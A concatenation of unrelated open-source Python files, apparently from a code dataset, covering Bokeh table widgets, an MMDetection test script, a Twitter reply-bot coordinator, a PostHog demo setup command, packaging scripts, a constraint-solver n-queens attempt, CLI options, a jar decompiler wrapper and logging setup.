Shift + click to sort multiple columns simultaneously.
""")
reorderable = Bool(True, help="""
Allows the reordering of a table's columns. To reorder a column,
click and drag a table's header to the desired location in the table.
The columns on either side will remain in their previous order.
""")
editable = Bool(False, help="""
    Allows editing of the table's contents. Cell editors need to be configured on
    columns that should be editable.
""")
selectable = Either(Bool(True), Enum("checkbox"), help="""
Whether a table's rows can be selected or not. Using ``checkbox`` is
equivalent to ``True``, but makes selection visible through a checkbox
for each row, instead of highlighting rows. Multiple selection is
allowed and can be achieved by either clicking multiple checkboxes (if
enabled) or using Shift + click on rows.
""")
index_position = Int(0, help="""
Where among the list of columns to insert a column displaying the row
index. Negative indices are supported, and specify an index position
from the end of the list of columns (i.e. standard Python behaviour).
To prevent the index column from being added, set to None.
If the absolute value of index_position is larger than the length of
the columns, then the index will appear at the beginning or end, depending
on the sign.
""")
index_header = String("#", help="""
The column header to display for the index column, if it is present.
""")
index_width = Int(40, help="""
The width of the index column, if present.
""")
scroll_to_selection = Bool(True, help="""
Whenever a selection is made on the data source, scroll the selected
rows into the table's viewport if none of the selected rows are already
in the viewport.
""")
header_row = Bool(True, help="""
Whether to show a header row with column names at the top of the table.
""")
width = Override(default=600)
height = Override(default=400)
row_height = Int(25, help="""
The height of each row in pixels.
""")
class GroupingInfo(Model):
'''Describes how to calculate totals and sub-totals
'''
getter = String('', help="""
References the column which generates the unique keys of this sub-total (groupby).
""")
aggregators = List(Instance(RowAggregator), help="""
Describes how to aggregate the columns which will populate this sub-total.
""")
collapsed = Bool(False, help="""
Whether the corresponding sub-total is expanded or collapsed by default.
""")
class DataCube(DataTable):
'''Specialized DataTable with collapsing groups, totals, and sub-totals.
'''
grouping = List(Instance(GroupingInfo), help="""
    Describes the aggregation operations used to define sub-totals and totals.
""")
target = Instance(DataSource, help="""
    Two-column data source (row_indices & labels) describing which rows of the
    data cube are expanded or collapsed.
""")
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
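# The sketch below is illustrative only and not part of Bokeh itself: it shows
# one way the widgets defined above are typically combined. The data, field
# names, and the helper name `_example_data_table` are made up for this example.
def _example_data_table():
    from bokeh.models import ColumnDataSource
    source = ColumnDataSource(data=dict(name=['apple', 'pear'], price=[1.25, 0.90]))
    columns = [
        TableColumn(field='name', title='Name'),
        TableColumn(field='price', title='Price',
                    formatter=NumberFormatter(format='$0,0.00')),
    ]
    return DataTable(source=source, columns=columns, width=400, height=200)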
|
py | b404087f9dad3a2f19d68ad79079471f00f00a9b | import argparse
import os
import warnings
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.cnn import fuse_conv_bn
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import (get_dist_info, init_dist, load_checkpoint,
wrap_fp16_model)
from mmdet.apis import multi_gpu_test, single_gpu_test
from mmdet.datasets import (build_dataloader, build_dataset,
replace_ImageToTensor)
from mmdet.models import build_detector
def parse_args():
parser = argparse.ArgumentParser(
description='MMDet test (and eval) a model')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', default='/data_raid5_21T/zgh/ZGh/work_dirs/cascade_r2_3/latest.pth' , help='checkpoint file')
parser.add_argument('--out', help='output result file in pickle format')
parser.add_argument(
'--fuse-conv-bn',
action='store_true',
        help='Whether to fuse conv and bn; this will slightly increase '
'the inference speed')
parser.add_argument(
'--format-only',
action='store_true',
        help='Format the output results without performing evaluation. It is '
'useful when you want to format the result to a specific format and '
'submit it to the test server')
parser.add_argument(
'--eval',
type=str,
nargs='+',
        help='evaluation metrics, which depend on the dataset, e.g., "bbox",'
' "segm", "proposal" for COCO, and "mAP", "recall" for PASCAL VOC')
parser.add_argument('--show', action='store_true', help='show results')
parser.add_argument(
'--show-dir', help='directory where painted images will be saved')
parser.add_argument(
'--show-score-thr',
type=float,
default=0.3,
help='score threshold (default: 0.3)')
parser.add_argument(
'--gpu-collect',
action='store_true',
help='whether to use gpu to collect results.')
parser.add_argument(
'--tmpdir',
help='tmp directory used for collecting results from multiple '
'workers, available when gpu-collect is not specified')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='custom options for evaluation, the key-value pair in xxx=yyy '
'format will be kwargs for dataset.evaluate() function (deprecate), '
'change to --eval-options instead.')
parser.add_argument(
'--eval-options',
nargs='+',
action=DictAction,
help='custom options for evaluation, the key-value pair in xxx=yyy '
'format will be kwargs for dataset.evaluate() function')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.eval_options:
raise ValueError(
'--options and --eval-options cannot be both '
'specified, --options is deprecated in favor of --eval-options')
if args.options:
warnings.warn('--options is deprecated in favor of --eval-options')
args.eval_options = args.options
return args
def main():
args = parse_args()
assert args.out or args.eval or args.format_only or args.show \
or args.show_dir, \
('Please specify at least one operation (save/eval/format/show the '
'results / save the results) with the argument "--out", "--eval"'
', "--format-only", "--show" or "--show-dir"')
if args.eval and args.format_only:
raise ValueError('--eval and --format_only cannot be both specified')
if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):
raise ValueError('The output file must be a pkl file.')
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
cfg.model.pretrained = None
if cfg.model.get('neck'):
if isinstance(cfg.model.neck, list):
for neck_cfg in cfg.model.neck:
if neck_cfg.get('rfp_backbone'):
if neck_cfg.rfp_backbone.get('pretrained'):
neck_cfg.rfp_backbone.pretrained = None
elif cfg.model.neck.get('rfp_backbone'):
if cfg.model.neck.rfp_backbone.get('pretrained'):
cfg.model.neck.rfp_backbone.pretrained = None
# in case the test dataset is concatenated
samples_per_gpu = 1
if isinstance(cfg.data.test, dict):
cfg.data.test.test_mode = True
samples_per_gpu = cfg.data.test.pop('samples_per_gpu', 1)
if samples_per_gpu > 1:
# Replace 'ImageToTensor' to 'DefaultFormatBundle'
cfg.data.test.pipeline = replace_ImageToTensor(
cfg.data.test.pipeline)
elif isinstance(cfg.data.test, list):
for ds_cfg in cfg.data.test:
ds_cfg.test_mode = True
samples_per_gpu = max(
[ds_cfg.pop('samples_per_gpu', 1) for ds_cfg in cfg.data.test])
if samples_per_gpu > 1:
for ds_cfg in cfg.data.test:
ds_cfg.pipeline = replace_ImageToTensor(ds_cfg.pipeline)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# build the dataloader
dataset = build_dataset(cfg.data.test)
data_loader = build_dataloader(
dataset,
samples_per_gpu=samples_per_gpu,
workers_per_gpu=cfg.data.workers_per_gpu,
dist=distributed,
shuffle=False)
# build the model and load checkpoint
cfg.model.train_cfg = None
model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))
fp16_cfg = cfg.get('fp16', None)
if fp16_cfg is not None:
wrap_fp16_model(model)
checkpoint = load_checkpoint(model, args.checkpoint, map_location='cpu')
if args.fuse_conv_bn:
model = fuse_conv_bn(model)
    # old versions did not save class info in checkpoints; this workaround is
# for backward compatibility
if 'CLASSES' in checkpoint['meta']:
model.CLASSES = checkpoint['meta']['CLASSES']
else:
model.CLASSES = dataset.CLASSES
if not distributed:
model = MMDataParallel(model, device_ids=[0])
outputs = single_gpu_test(model, data_loader, args.show, args.show_dir,
args.show_score_thr)
else:
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False)
outputs = multi_gpu_test(model, data_loader, args.tmpdir,
args.gpu_collect)
rank, _ = get_dist_info()
if rank == 0:
if args.out:
print(f'\nwriting results to {args.out}')
mmcv.dump(outputs, args.out)
kwargs = {} if args.eval_options is None else args.eval_options
if args.format_only:
dataset.format_results(outputs, **kwargs)
if args.eval:
eval_kwargs = cfg.get('evaluation', {}).copy()
# hard-code way to remove EvalHook args
for key in [
'interval', 'tmpdir', 'start', 'gpu_collect', 'save_best',
'rule'
]:
eval_kwargs.pop(key, None)
eval_kwargs.update(dict(metric=args.eval, **kwargs))
print(dataset.evaluate(outputs, **eval_kwargs))
if __name__ == '__main__':
main()
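# Example invocations (the config and checkpoint paths below are placeholders):
#   python test.py configs/my_config.py work_dirs/latest.pth --eval bbox
#   python -m torch.distributed.launch --nproc_per_node=4 test.py \
#       configs/my_config.py work_dirs/latest.pth --launcher pytorch --eval bbox segm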
|
py | b40408890548046c865134607eff3304bfff8c33 | # import the similarity analyzer class
from similarity_analyzer import SimilarityAnalyzer
# import datetime for the timestamp in response checked queue
from datetime import datetime, timedelta
# import time to be able to sleep
import time
# import twythonaccess to be able to send tweets
import twythonaccess
# import setup to be able to read the persona
import setup
# import error messenger
from error_messenger import send_error_message
# The Coordinator class will coordinate all actions (wow so much info)
# It will be accessed concurrently from four different threads
# Each of its methods will only be accessed by one thread at a time
# Communication between threads happens via the class' properties (e.g. the tweet lists)
class Coordinator():
# The queue of tweets to be analyzed for similarity
# This should always be kept under, say, 100 elements
# The above measure is to ensure the waiting time for similarity analysis is short,
    # i.e. we don't want a bottleneck waiting for similarity analysis
similarity_analyzer_queue = []
# The queue of tweets to be sent
# This should be kept under, say, 2 elements
# This is to ensure the response isn't all too delayed, but still somewhat delayed
# The data is a tuple, on the following form: (reply_text, base_tweet, similarity_ratio)
send_tweet_queue = []
# The queue of tweets to be response checked
# It takes around 1 minute to process each tweet
# And a waiting time of around 5 hours should be suitable
# Thus, the limit to this queue should be 300 elements
# The elements are constituted by a tuple: (timestamp, tweet)
# They should not be processed if less than 2 hours have passed
response_checker_queue = []
# The threshold for sending a tweet should initially be set to 0.5
# The threshold is increased whenever a match is made, and vice versa
# Thus, the bot will only get more accurate over time
similarity_threshold = 0.5
# Getting new tweets from streamer
# Just add them to the similarity queue, after filtering out some tweets
def new_tweet(self, tweet):
# filter out retweets
if tweet["text"].startswith("RT"):
return
if "retweeted_status" in tweet:
return
# don't reply to replies – they have too much context going on
if tweet["in_reply_to_status_id"] != None:
return
# if the user is protected, then return
if tweet["user"]["protected"]:
return
# filter out tweets containing urls – once again, we don't really know what's going on
if tweet["entities"]["urls"]:
return
# add to the similarity analyzer queue, if its length is less than 100 elements
if len(self.similarity_analyzer_queue) < 100:
print("new tweet: " + tweet["text"])
self.similarity_analyzer_queue.append(tweet)
# The last sent response, to not send the same response twice
last_sent_response = ""
# This loop is run in its own thread, indefinitely
# It takes the first element from the queue, analyzes it,
# and appends to both the send tweet list and the response checker list
def similarity_analysis_loop(self):
# add error handling
while True:
try:
# sleep for periods of 10 seconds until there is a tweet in the queue
while len(self.similarity_analyzer_queue) == 0:
time.sleep(10)
# Take the first element from the similarity analyzer queue
tweet = self.similarity_analyzer_queue.pop(0)
# analyze the tweet
# the analyzer will return the best match tweet text, along with the similarity ratio between the tweet and its match
# the max length of the response text has to be 140 - 1 - length of screen name - 1, for the "@screen_name " prefix
best_match_response, similarity_ratio = self.similarity_analyzer.analyze_tweet(tweet["text"], max_length = 138 - len(tweet["user"]["screen_name"]))
print("found similar response with similarity ratio of " + str(similarity_ratio) + ": " + best_match_response)
# check if the similarity ratio is greater than or equal to the threshold, or not
if similarity_ratio >= self.similarity_threshold:
if self.last_sent_response != best_match_response:
# yay, we can send this tweet
# the send tweet queue should never be longer than 1 element
if len(self.send_tweet_queue) < 1:
self.send_tweet_queue.append((best_match_response, tweet, similarity_ratio))
else:
# if any tweet has a ratio lower than the current threshold,
# then replace that tweet with this one
# this means that even though this similarity ratio may be higher than any similarity ratio in the send tweet queue,
# don't replace them if they are not beneath the threshold. this is for more unpredictability, and more humanness.
# if this ratio is greater than the to be sent one, but less than 0.7, then exchange them. NOPE
for index, (to_be_sent_response, to_be_sent_to_tweet, to_be_sent_ratio) in enumerate(self.send_tweet_queue):
if to_be_sent_ratio < self.similarity_threshold:
self.send_tweet_queue[index] = (best_match_response, tweet, similarity_ratio)
break
# Increase the threshold, in an effort to increase the accuracy of the tweets
# Increase it by 0.01 (if smaller than 0.9)
self.similarity_threshold = min(0.9, self.similarity_threshold + 0.01)
else:
# Decrease the threshold, so as to be able to finally send some tweets
# Never go below 0.2
self.similarity_threshold = max(0.2, self.similarity_threshold - 0.01)
print("new threshold: " + str(self.similarity_threshold))
# if the response checked queue has fewer than 300 elements, add this tweet, along with the current timestamp
if len(self.response_checker_queue) < 300:
self.response_checker_queue.append((datetime.utcnow(), tweet))
except Exception as exception:
# print the exception and then sleep for 2 hours
# the sleep will reset all rate limiting
print(exception)
print("will sleep for 2 hours to avoid exception in similarity analysis loop")
send_error_message(exception, "similarity_analysis_loop")
time.sleep(2 * 60 * 60)
print("finished sleep after exception in similarity analysis loop. will now start anew")
# This function should run in its own thread, indefinitely
# It gets tweets from the queue, and processes them to find the best response
# If a good enough response is found, then the response and the base tweet is appended to the responses.txt
def response_checker_loop(self):
while True:
try:
# wait until there is a tweet in the queue
while len(self.response_checker_queue) == 0:
time.sleep(10)
# take the first element
# it is a tuple, formatted (timestamp, tweet)
timestamp, tweet = self.response_checker_queue.pop(0)
# sleep until two hours since the tweet was sent have passed
time.sleep(max(0, (timestamp + timedelta(hours=2) - datetime.utcnow()).total_seconds()))
print("response checking tweet: " + tweet["text"])
# great
# now, lets find the replies
# 180 calls like this one are allowed per 15 minute window
possible_replies = twythonaccess.authorize(twitter_app = twythonaccess.TwitterApp.response_checker).search(q = "@" + tweet["user"]["screen_name"], count = 100, result_type = "recent", since_id = tweet["id"], include_entities = False)["statuses"]
# now go through each reply, and find real replies
real_replies = []
for possible_reply in possible_replies:
if possible_reply["in_reply_to_status_id"] == tweet["id"]:
# yay, we found a real reply
real_replies.append(possible_reply)
if not real_replies:
# well, to spare any api calls, simply return prematurely here
# wait for 8 seconds to satisfy api limits on search
time.sleep(8)
continue
# now that we (potentially) have the real replies, find the best one
# initialize it with None, because we might not find a suitable reply
best_reply = None
if setup.FAVOR_RESPONSES_LIKED_BY_THE_RESPONDEE:
# just choose the first tweet that seems to be liked by the respondee
# first get the 200 most recently liked tweets by the respondee
# this api call is rate limited at once per minute
recently_liked = twythonaccess.authorize(twythonaccess.TwitterApp.response_checker).get_favorites(user_id = tweet["user"]["id"], count = 200, since_id = tweet["id"], include_entities = False)
# now, we just have to check whether any of these tweets coincide with a tweet in the real_replies
for real_reply in real_replies:
for liked in recently_liked:
if real_reply["id"] == liked["id"]:
# yay! we found a reply that was liked by the original tweet author
# if the user has liked many replies, we don't care about that
best_reply = real_reply
break
else:
continue
break
else:
# determine the tweet to add based on the like and retweet count
best_reply_like_and_retweet_count = 0
for real_reply in real_replies:
super_count = real_reply["favorite_count"] + real_reply["retweet_count"]
if super_count > best_reply_like_and_retweet_count:
best_reply = real_reply
best_reply_like_and_retweet_count = super_count
# check whether the best reply is a tweet or not
if best_reply != None:
print("did find best reply: " + best_reply["text"])
# yay, we have a decent reply!
reply_text = best_reply["text"]
base_text = tweet["text"]
# now, remove the mentions at the start of the reply text
while reply_text.startswith("@"):
# remove the first word
reply_text = reply_text.split(" ", 1)[1]
                    # encode all newlines as explicitly written newlines, so that the tweets fit on one line each
reply_text = reply_text.replace("\n", "\\n")
base_text = base_text.replace("\n", "\\n")
# now, append the reply text and the base text to the responses.txt file
# the reply text should be written first, and the base text afterwards
# we assume that the responses.txt file is correctly formatted (i.e. preserving the always-even-lines invariant)
with open("responses.txt", "a") as responses_file:
responses_file.write(reply_text + "\n")
responses_file.write(base_text + "\n")
# now, sleep for 70 seconds (to avoid rate limiting on get_favorites)
time.sleep(70)
except Exception as exception:
print("oh, some error in response checker loop")
print(exception)
send_error_message(exception, "response_checker_loop")
print("will wait for 2 hours")
time.sleep(2 * 60 * 60)
print("has slept in response checker loop, will now start anew")
# This function is run in its own thread, indefinitely
# It takes tweets from the send_tweet_queue, and sends them
# It waits for 1 minute between each sent tweet, in an effort not to get rate limited
# Apparently, 1 minute is too short a wait
# Twitter has no strict rules on this, but try 15 minutes
# 10 minutes do not work
def send_tweet_loop(self):
while True:
try:
# sleep until there is a tweet in the queue
while len(self.send_tweet_queue) == 0:
time.sleep(30)
# take the first element
# it is a tuple, as defined above
reply_text, base_tweet, similarity_ratio = self.send_tweet_queue.pop(0)
self.last_sent_response = reply_text
# add @screen_name to the reply text
reply_text = "@" + base_tweet["user"]["screen_name"] + " " + reply_text
# send the tweet
twythonaccess.send_tweet(reply_text, twitter_app = twythonaccess.TwitterApp.send_tweet, in_reply_to_status_id = base_tweet["id"])
# sleep for 15 minutes
time.sleep(15 * 60)
except Exception as exception:
print("oh, some error in send tweet loop")
print(exception)
print("will wait for 2 hours")
send_error_message(exception, "send_tweet_loop")
time.sleep(2 * 60 * 60)
print("has slept in send tweet loop, will now start anew")
|
py | b40408c4634d44be6f4f38e70d996be3fc76f64e | from django.core.management.base import BaseCommand
from django.db import transaction
from posthog.demo import ORGANIZATION_NAME, TEAM_NAME, create_demo_data
from posthog.models import PersonalAPIKey, User
from posthog.models.event_definition import EventDefinition
from posthog.models.property_definition import PropertyDefinition
class Command(BaseCommand):
help = "Set up the instance for development/review with demo data"
def add_arguments(self, parser):
parser.add_argument(
"--no-data", action="store_true", help="Create demo account without data",
)
def handle(self, *args, **options):
with transaction.atomic():
_, team, user = User.objects.bootstrap(
organization_name=ORGANIZATION_NAME,
email="[email protected]",
password="12345678",
first_name="Jane Doe",
is_staff=True,
team_fields={
"name": TEAM_NAME,
"api_token": "e2e_token_1239",
"completed_snippet_onboarding": True,
"ingested_event": True,
"event_names": ["$pageview", "$autocapture"],
"event_properties": ["$current_url", "$browser", "$os"],
},
)
EventDefinition.objects.create(team=team, name="$pageview")
EventDefinition.objects.create(team=team, name="$autocapture")
PropertyDefinition.objects.create(team=team, name="$current_url")
PropertyDefinition.objects.create(team=team, name="$browser")
PropertyDefinition.objects.create(team=team, name="$os")
PropertyDefinition.objects.create(team=team, name="usage_count", is_numerical=True)
PropertyDefinition.objects.create(team=team, name="volume", is_numerical=True)
PropertyDefinition.objects.create(team=team, name="is_first_movie")
PersonalAPIKey.objects.create(user=user, label="e2e_demo_api_key key", value="e2e_demo_api_key")
if not options["no_data"]:
create_demo_data(team)
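# Example invocation (assuming this command module is installed under a Django
# app's management/commands/ directory, e.g. as setup_dev.py):
#   python manage.py setup_dev
#   python manage.py setup_dev --no-data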
|
py | b40409f658f14173442ffc1364b08c31292fb818 | #! /usr/bin/env python
#
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from ginga.version import version
import os
srcdir = os.path.dirname(__file__)
from distutils.command.build_py import build_py
def read(fname):
buf = open(os.path.join(srcdir, fname), 'r').read()
return buf
# not yet working...
def get_docs():
docdir = os.path.join(srcdir, 'doc')
res = []
# ['../../doc/Makefile', 'doc/conf.py', 'doc/*.rst',
# 'doc/manual/*.rst', 'doc/figures/*.png']
return res
setup(
name = "ginga",
version = version,
author = "Eric Jeschke",
author_email = "[email protected]",
description = ("An astronomical image viewer and toolkit."),
long_description = read('README.txt'),
license = "BSD",
keywords = "FITS image viewer astronomy",
url = "http://ejeschke.github.com/ginga",
packages = ['ginga',
# Gtk version
'ginga.cairow', 'ginga.gtkw', 'ginga.gtkw.plugins',
'ginga.gtkw.tests',
# Qt version
'ginga.qtw', 'ginga.qtw.plugins', 'ginga.qtw.tests',
# Tk version
'ginga.tkw',
# Matplotlib version
'ginga.mplw',
# aggdraw backend
'ginga.aggw',
# OpenCv backend
'ginga.cvw',
# Mock version
'ginga.mockw',
# Web stuff
'ginga.web', 'ginga.web.pgw',
'ginga.web.pgw.js', 'ginga.web.pgw.templates',
# Common stuff
'ginga.misc', 'ginga.misc.plugins', 'ginga.base',
'ginga.canvas', 'ginga.util',
# Misc
'ginga.icons', 'ginga.doc', 'ginga.tests',
],
package_data = { 'ginga.icons': ['*.ppm', '*.png'],
'ginga.gtkw': ['gtk_rc'],
#'ginga.doc': get_docs(),
'ginga.doc': ['manual/*.html'],
'ginga.web.pgw': ['templates/*.html', 'js/*.js'],
},
scripts = ['scripts/ginga', 'scripts/grc', 'scripts/gris'],
install_requires = ['numpy>=1.7'],
test_suite = "ginga.tests",
classifiers=[
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: C',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Astronomy',
'Topic :: Scientific/Engineering :: Physics',
],
cmdclass={'build_py': build_py}
)
|
py | b4040c1ef446fa7c825ec925cfb57f228c363261 | from typing import List
from constraint import *
problem = Problem()
numpieces = 4
rows = [1,2,3,4]
problem.addVariables([1,2,3,4], range(numpieces))
def not_same_column(x, y):
return x != y
def not_same_diagonal_downwards(row1, row2, colu1, colu2):
return row1-colu1 != row2-colu2
def not_same_diagonal_upwards(row1, row2, colu1, colu2):
print(str(row1) + " " + str(row2) + " " + str(colu1) + " " + str(colu2))
    # Two queens share an upward (anti-)diagonal when row + column is equal.
    if row1 + colu1 != row2 + colu2:
        print("This pair is fine")
        return True
    else:
        print("This pair clashes")
        return False
# Queens must all be on different rows (the variables are columns, the values are rows).
problem.addConstraint(AllDifferentConstraint())
for f1 in rows:
    for f2 in rows:
        if f1 < f2:
            print(f1)
            print(f2)
            # Bind this pair's column indices so the diagonal check receives them as well.
            problem.addConstraint(
                lambda row1, row2, c1=f1, c2=f2: not_same_diagonal_downwards(row1, row2, c1, c2),
                (f1, f2))
#problem.addConstraint(lambda row1, row2: not_same_diagonal_upwards(row1, row2, col1, col2), (col1, col2))
#problem.addConstraint(lambda row1, row2: row1 != row2,(col1, col2))
# problem.addConstraint(lambda row1, row2: (row1 - col1) != (row2 - col2),
# (col1, col2))
# problem.addConstraint(lambda row1, row2: (row1 - row2) != (col2 - col1),
# (col1, col2))
solutions = problem.getSolutions()
print(solutions)
|
py | b4040c952ac45ece967e50d379621a5f3e884094 | import unittest
from unittest.mock import patch
from src.weight.weight_calculator import handler
class CalculatorTests(unittest.TestCase):
@patch("src.weight.weight_calculator.LOGGER")
def test_success(self, mock_logger):
event = {
"queryStringParameters": {
"height": 180
}
}
response = handler(event, None)
self.assertEqual(200, response["statusCode"])
self.assertEqual("""{"weight": 80}""", response["body"])
mock_logger.info.assert_called_once_with("Some info message")
|
py | b4040d06558b8483134d9ca3f4c2ab385bbdc016 | # cligj
# Shared arguments and options.
import click
from .features import normalize_feature_inputs
# Arguments.
# Multiple input files.
files_in_arg = click.argument(
'files',
nargs=-1,
type=click.Path(resolve_path=True),
required=True,
metavar="INPUTS...")
# Multiple files, last of which is an output file.
files_inout_arg = click.argument(
'files',
nargs=-1,
type=click.Path(resolve_path=True),
required=True,
metavar="INPUTS... OUTPUT")
# Features from files, command line args, or stdin.
# Returns the input data as an iterable of GeoJSON Feature-like
# dictionaries.
features_in_arg = click.argument(
'features',
nargs=-1,
callback=normalize_feature_inputs,
metavar="FEATURES...")
# Options.
verbose_opt = click.option(
'--verbose', '-v',
count=True,
help="Increase verbosity.")
quiet_opt = click.option(
'--quiet', '-q',
count=True,
help="Decrease verbosity.")
# Format driver option.
format_opt = click.option(
'-f', '--format', '--driver', 'driver',
default='GTiff',
help="Output format driver")
# JSON formatting options.
indent_opt = click.option(
'--indent',
type=int,
default=None,
help="Indentation level for JSON output")
compact_opt = click.option(
'--compact/--not-compact',
default=False,
help="Use compact separators (',', ':').")
# Coordinate precision option.
precision_opt = click.option(
'--precision',
type=int,
default=-1,
help="Decimal precision of coordinates.")
# Geographic (default), projected, or Mercator switch.
projection_geographic_opt = click.option(
'--geographic',
'projection',
flag_value='geographic',
default=True,
help="Output in geographic coordinates (the default).")
projection_projected_opt = click.option(
'--projected',
'projection',
flag_value='projected',
help="Output in dataset's own, projected coordinates.")
projection_mercator_opt = click.option(
'--mercator',
'projection',
flag_value='mercator',
help="Output in Web Mercator coordinates.")
# Feature collection or feature sequence switch.
sequence_opt = click.option(
'--sequence/--no-sequence',
default=False,
help="Write a LF-delimited sequence of texts containing individual "
"objects or write a single JSON text containing a feature "
"collection object (the default).")
use_rs_opt = click.option(
'--rs/--no-rs',
'use_rs',
default=False,
help="Use RS (0x1E) as a prefix for individual texts in a sequence "
"as per http://tools.ietf.org/html/draft-ietf-json-text-sequence-13 "
"(default is False).")
# GeoJSON output mode option.
def geojson_type_collection_opt(default=False):
return click.option(
'--collection',
'geojson_type',
flag_value='collection',
default=default,
help="Output as GeoJSON feature collection(s).")
def geojson_type_feature_opt(default=False):
return click.option(
'--feature',
'geojson_type',
flag_value='feature',
default=default,
help="Output as GeoJSON feature(s).")
def geojson_type_bbox_opt(default=False):
return click.option(
'--bbox',
'geojson_type',
flag_value='bbox',
default=default,
help="Output as GeoJSON bounding box array(s).")
|
py | b4040f424cf983f14a7a21c68d225d65c6b46cee | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
from lib_apk_shrink.model.DecompileConfig import DecompileConfig
__author__ = 'tiantong'
class JarDecompile(object):
decompile_config = DecompileConfig()
output_path_decompile = ""
output_path_out = ""
def __init__(self, decompileConfig=DecompileConfig()):
self.decompile_config = decompileConfig
def decompile_jar(self):
jad_path = self.decompile_config.jad_path
output_path = self.decompile_config.output_path
        # Remove the previous output directories
self.output_path_out = os.path.join(output_path, 'out')
self.output_path_decompile = os.path.join(output_path, 'decompile')
self.clearOutput();
        # Make sure the output directory exists
if not os.path.exists(self.output_path_out):
os.makedirs(self.output_path_out)
        # Remove the useless META-INF directory
META_path = os.path.join(self.output_path_out, 'META-INF')
        # Unzip the jars
for jar_path in self.decompile_config.extra_jar:
command = 'unzip -o ' + jar_path + ' -d ' + self.output_path_out
result = os.popen(command).read()
self.delDir(META_path)
        # Decompile with jad
command = jad_path + ' -r -o -ff -d ' + self.output_path_decompile + ' -s java ' + self.output_path_out + '/**/*.class'
result = os.popen(command).read()
def delDir(self, dir):
if os.path.isdir(dir):
shutil.rmtree(dir)
def clearOutput(self):
self.delDir(self.output_path_decompile)
self.delDir(self.output_path_out)
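# Illustrative usage sketch (not part of the original module); the jad binary,
# output directory and jar list below are made-up values assigned to the
# DecompileConfig fields that decompile_jar() reads:
#
#   config = DecompileConfig()
#   config.jad_path = "/usr/local/bin/jad"
#   config.output_path = "/tmp/apk_shrink"
#   config.extra_jar = ["/tmp/libs/mylib.jar"]
#   JarDecompile(config).decompile_jar()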
|
py | b4040fe3da09aba4b4f5fb0341d3fb0dcd0a3f72 | import logging
import logging.config
from pathlib import Path
from utils.util import read_json
def setup_logging(save_dir, log_config='logger/logger_config.json', default_level=logging.INFO):
"""
    Setup logging configuration.
    :param save_dir: directory where log files are saved
    :param log_config: path of the logging configuration file
    :param default_level: default logging level used as a fallback
    :return:
"""
    # Resolve the config file path
    log_config = Path(log_config)
    # The config file exists
    if log_config.is_file():
        # Parse the JSON config
        config = read_json(log_config)
        # Point every file handler's output at the save directory
        for _, handler in config['handlers'].items():
            if 'filename' in handler:
                # save directory / file name
                handler['filename'] = str(save_dir / handler['filename'])
        # Hand the parsed config to the logging module
        logging.config.dictConfig(config)
    # Config file not found
    else:
        print("Warning: logging configuration file was not found at {}.".format(log_config))
        # Fall back to the default basic config at the given level
        logging.basicConfig(level=default_level)
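# Illustrative usage sketch (not part of the original project): running this
# module directly exercises setup_logging(), falling back to basicConfig when
# the JSON config file is missing. The directory name below is made up.
if __name__ == "__main__":
    demo_dir = Path("saved_logs")
    demo_dir.mkdir(parents=True, exist_ok=True)
    setup_logging(demo_dir)
    logging.getLogger(__name__).info("logging configured")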
|
py | b40410789d5945c77d455f51421257415aba7658 | # -*- coding: utf-8 -*-
__author__ = 'Samir Adrik'
__email__ = '[email protected]'
from distutils.core import setup
import sys
def get_version():
sys.path.insert(0, 'pyfiglet')
from source.version import __version__
sys.path.pop(0)
return __version__
setup(
name='normb',
version=get_version(),
packages=['tests', 'source', 'source.util', 'source.multivariate_norm', 'source.exceptions'],
requires=['numpy (>=1.15.4)', 'pandas (>=0.24.0)', 'PrettyTable (>=0.7.2)',
'pytest (>=4.0.2)', 'rpy2 (>=2.9.4)', 'scipy (>=1.2.1)'],
url='',
license='MIT',
author='samir',
author_email='[email protected]',
description='Battery of normality tests for numeric pandas.DataFrame'
)
|
py | b40410a18dfe9d2d587a0a1bc0028057713a952c | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
